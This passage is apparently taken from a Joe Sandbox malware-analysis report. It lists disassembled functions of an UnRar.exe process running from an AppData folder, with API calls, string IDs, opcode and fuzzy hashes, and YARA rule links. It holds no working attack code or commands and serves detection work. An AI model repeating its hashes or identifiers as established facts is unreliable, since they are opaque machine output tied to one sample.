                                                            • Instruction Fuzzy Hash: 9C31C522E0E742C1FA60BF66A44427DE391FF887A0F865271EA9D436E6DF3CD5428710
                                                            Function 00007FF7AAD006FC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD00715
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD00777
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD007B1
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD007DB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            • Opcode ID: c9c8276d160cb3f846eade527f4d72046a8c629c4a8bd08b1ea50f4f0f09b7b6
                                                            • Instruction ID: 40ff8dc88ba2f137a2b3d861ca0620307b9febf59167fb02e85216f97601803c
                                                            • Opcode Fuzzy Hash: c9c8276d160cb3f846eade527f4d72046a8c629c4a8bd08b1ea50f4f0f09b7b6
                                                            • Instruction Fuzzy Hash: 8421A221E0AB91C1F660AF11640012AE7A4FB94BD0B894175DE9F23BB8DF7CD4538750
                                                            Function 00007FF7AACE26B0 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CurrentPriorityThread$ClassProcess
                                                            • String ID:
                                                            • API String ID: 1171435874-0
                                                            • Opcode ID: 0b9eeafd3d4027672927dc3b5275ce106bea78c5d487ac6432354b9cc99f18e6
                                                            • Instruction ID: b826bd5c68e0dcb1b0b54cd32d7e705f5812da52125d2c96c63e24eca5e9b3d5
                                                            • Opcode Fuzzy Hash: 0b9eeafd3d4027672927dc3b5275ce106bea78c5d487ac6432354b9cc99f18e6
                                                            • Instruction Fuzzy Hash: 61118275B1A642C6FA74AB04D88477DF265EF64700FA24074C74E16A65EF3C788F6720
                                                            Function 00007FF7AACFC240 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: e3e5e8a586045816927c8dc92e1f653a19a74dbfb25af139c6d086134b61b67d
                                                            • Instruction ID: 3222b32c8c075a06399b6ba2a0bdbcb8e513072984691575b2851164eb9e54c7
                                                            • Opcode Fuzzy Hash: e3e5e8a586045816927c8dc92e1f653a19a74dbfb25af139c6d086134b61b67d
                                                            • Instruction Fuzzy Hash: 0D018412B0F703C6FA4A73B1566517D9151AF48790F9605B9D81E47BF7DE2CE8034320
                                                            Function 00007FF7AACC5520 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: %s$ %s
                                                            • API String ID: 3668304517-2367710864
                                                            • Opcode ID: c26b0caf1a0209f5ee9ad2c6d2858e9dc66925ed21a2f46c8b891ad875a58a35
                                                            • Instruction ID: 2b4cec0f21764cd70fe7c7bc9ca585d87b9d3c0038f1e0d0cbb20d1567341168
                                                            • Opcode Fuzzy Hash: c26b0caf1a0209f5ee9ad2c6d2858e9dc66925ed21a2f46c8b891ad875a58a35
                                                            • Instruction Fuzzy Hash: 9EA1B362A4A786C1FA15BF3694402FDA7A1EF45B81F8520B5DB4E077B7CE2CE456C320
                                                            Function 00007FF7AACD3D3C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rar
                                                            • API String ID: 3668304517-1792618458
                                                            • Opcode ID: ed1159ef2bc1c0ecd9c284763b9e7d4284a0bed34479700285e2e19bbab7740e
                                                            • Instruction ID: 7f7aae0bc307482c5fbb09cd000f2b0acbce8a3a6671b981a5092c011296a053
                                                            • Opcode Fuzzy Hash: ed1159ef2bc1c0ecd9c284763b9e7d4284a0bed34479700285e2e19bbab7740e
                                                            • Instruction Fuzzy Hash: DAA19232A1AB42D5FB10EB25E8400ADA7B1FB81784F910571EB9D07AB9DF3DE546C720
                                                            Function 00007FF7AACD9294 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA0AB
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA0BE
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA11E
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA127
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACD9496
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast$_invalid_parameter_noinfo_noreturn
                                                            • String ID: $%s%s
                                                            • API String ID: 1381046063-4212163154
                                                            • Opcode ID: cbe111ce54bc5e10fadca169d44673410be98162f87faa034aa2c0b4d6109f7a
                                                            • Instruction ID: c9ee46ed0c98fd222c30609c4ae84e8af3450fe191803c45cd0e79f79a0055e1
                                                            • Opcode Fuzzy Hash: cbe111ce54bc5e10fadca169d44673410be98162f87faa034aa2c0b4d6109f7a
                                                            • Instruction Fuzzy Hash: 6571EF26B0AA42D6FB10FB75D4403ECA361AB40794F924272DA1C17AEAEF3DD44BC350
                                                            Function 00007FF7AACC1040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC0C68: GetLastError.KERNEL32(00000000,00000000), ref: 00007FF7AACC0C75
                                                              • Part of subcall function 00007FF7AACC0C68: FormatMessageW.KERNEL32 ref: 00007FF7AACC0CA9
                                                              • Part of subcall function 00007FF7AACC0C68: LocalFree.KERNEL32 ref: 00007FF7AACC0CD3
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC121C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC1222
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ErrorFormatFreeLastLocalMessagefflush
                                                            • String ID: %s
                                                            • API String ID: 3338125653-2495117400
                                                            • Opcode ID: 2b449f770e2b2943765a4ac34354b5068bbb7864e1457b67dc8cafbb665d237d
                                                            • Instruction ID: 95be4141e762552c5c00d164ef2f1b48dde7b4b9e6672e50ac4c9515dc1c8b38
                                                            • Opcode Fuzzy Hash: 2b449f770e2b2943765a4ac34354b5068bbb7864e1457b67dc8cafbb665d237d
                                                            • Instruction Fuzzy Hash: F451C022B16741D4FB00EF61E4842ADA7A1AB44BA4F961275DE6D13BE9DF3CD883C310
                                                            Function 00007FF7AACDEF9C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: System Volume Information\
                                                            • API String ID: 3668304517-4227249723
                                                            • Opcode ID: 3c17c4326802313e560926a29751b24d28e1545a7f9e51f9ea90e2bb67fee599
                                                            • Instruction ID: 435235d2a82db93c803856de53af1aa8baa9db2206a434e2146bd6ed109df175
                                                            • Opcode Fuzzy Hash: 3c17c4326802313e560926a29751b24d28e1545a7f9e51f9ea90e2bb67fee599
                                                            • Instruction Fuzzy Hash: A551EF62A1B782C5FB00EB64D4803BDA761FB44BA4F855271DA6D136E9DF3CE482C360
                                                            Function 00007FF7AACFDA54 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: c16c9e0aaca838bf57974ce9f2164efadb1b7a4b5174a61bd03852391620eb26
                                                            • Instruction ID: b920940be84261ce29c1692f11dea7ece83206954204ce01631d4f1a15e7f13d
                                                            • Opcode Fuzzy Hash: c16c9e0aaca838bf57974ce9f2164efadb1b7a4b5174a61bd03852391620eb26
                                                            • Instruction Fuzzy Hash: 45513763B193C386F7259F35985136DAB91EB40B94F8982B2C69847BE6CE2CD046C710
                                                            Function 00007FF7AACDE6B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \\?\
                                                            • API String ID: 0-4282027825
                                                            • Opcode ID: 5d733a916d82734743caf5e6ea7a8d127602f343743acdd0c5d70af6158ab028
                                                            • Instruction ID: 628716bc7500620b15635d6bf444b8dc1b20e1ffb393975c3d6b9cd06eb66854
                                                            • Opcode Fuzzy Hash: 5d733a916d82734743caf5e6ea7a8d127602f343743acdd0c5d70af6158ab028
                                                            • Instruction Fuzzy Hash: 8951FF32A16782D5FB54EF21D4442BCA7A0FB48B88F8214B5DE5E137A1DF38E462C360
                                                            Function 00007FF7AACB3880 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                            • String ID: \033'
                                                            • API String ID: 73155330-3165038308
                                                            • Opcode ID: e1e65d390edf35f92f6c265c1dea4ce6a4dfd3975d2d9cd118f8152d5103f6e2
                                                            • Instruction ID: c61ace7afbee28026351048a07e4b66e430b9875e15e45452ad853ff3de1ca88
                                                            • Opcode Fuzzy Hash: e1e65d390edf35f92f6c265c1dea4ce6a4dfd3975d2d9cd118f8152d5103f6e2
                                                            • Instruction Fuzzy Hash: 1B41F062B0AB46D1FE10BB56E4542BDA310EB44BE0FC50671DE6E07BE6EE3DE1428310
                                                            Function 00007FF7AACFAF4C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe, xrefs: 00007FF7AACFAF85
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                            • API String ID: 3307058713-3942609192
                                                            • Opcode ID: 3d88997d612e58fdd6cd176ed81353cf28d32e481e6abda0fbeef29be17ab213
                                                            • Instruction ID: 709e1f40f18688d340b5041b60cff202b1cec17f93f8c56d4eddc88ec4e33961
                                                            • Opcode Fuzzy Hash: 3d88997d612e58fdd6cd176ed81353cf28d32e481e6abda0fbeef29be17ab213
                                                            • Instruction Fuzzy Hash: E0418C73A0A753CAF715EF2194500BCE6A4EB44BD4B964072E94E47B6ACE3DE483C320
                                                            Function 00007FF7AACD9DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidesnprintf
                                                            • String ID: $%s$@%s
                                                            • API String ID: 3570271137-834177443
                                                            • Opcode ID: e6673dd7b86d7778f0022978c9d4f3a540cc0fbe6537023cd2fbba2bd2e54363
                                                            • Instruction ID: b62aa33b559e63be08ffb4af2b408741208be46b23cb5fdd98ca32c983aa225e
                                                            • Opcode Fuzzy Hash: e6673dd7b86d7778f0022978c9d4f3a540cc0fbe6537023cd2fbba2bd2e54363
                                                            • Instruction Fuzzy Hash: 1931C176B1AA86C5FA20AF65E4406A9A3A0FB44B84F811072DE4D17B79EE3DE506C310
                                                            Function 00007FF7AACBA8BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                            • String ID: RAR
                                                            • API String ID: 1283921372-4236143952
                                                            • Opcode ID: d044c2dd542b4e7d770e56ca46a6c09d133d9efc04302d5c426f4de8fd9650dd
                                                            • Instruction ID: d12a064e6aa76a48f09f7dceea8405a0198f6ec6c6d673c1088c5937199d7750
                                                            • Opcode Fuzzy Hash: d044c2dd542b4e7d770e56ca46a6c09d133d9efc04302d5c426f4de8fd9650dd
                                                            • Instruction Fuzzy Hash: B831B662F16752C9FF00E7B4D4512BC6321AF45BA4F825371DABD26AEADF689046C310
                                                            Function 00007FF7AACF232C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AACB324F), ref: 00007FF7AACF2370
                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AACB324F), ref: 00007FF7AACF23B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: 666a5ac7589b60e949ef5d54d8dbb4e058397ac3e731a425920e86d7596641ef
                                                            • Instruction ID: 280f21f64ba852a5da86f3c7e0a39b895d9d85dc16aa6cd80daaeae2c9bf506e
                                                            • Opcode Fuzzy Hash: 666a5ac7589b60e949ef5d54d8dbb4e058397ac3e731a425920e86d7596641ef
                                                            • Instruction Fuzzy Hash: 0A113D32609B4282FB209F15F45026DB7A5FB88B94F994270DE8D07B68EF3CD556CB00
                                                            Function 00007FF7AACE2B28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
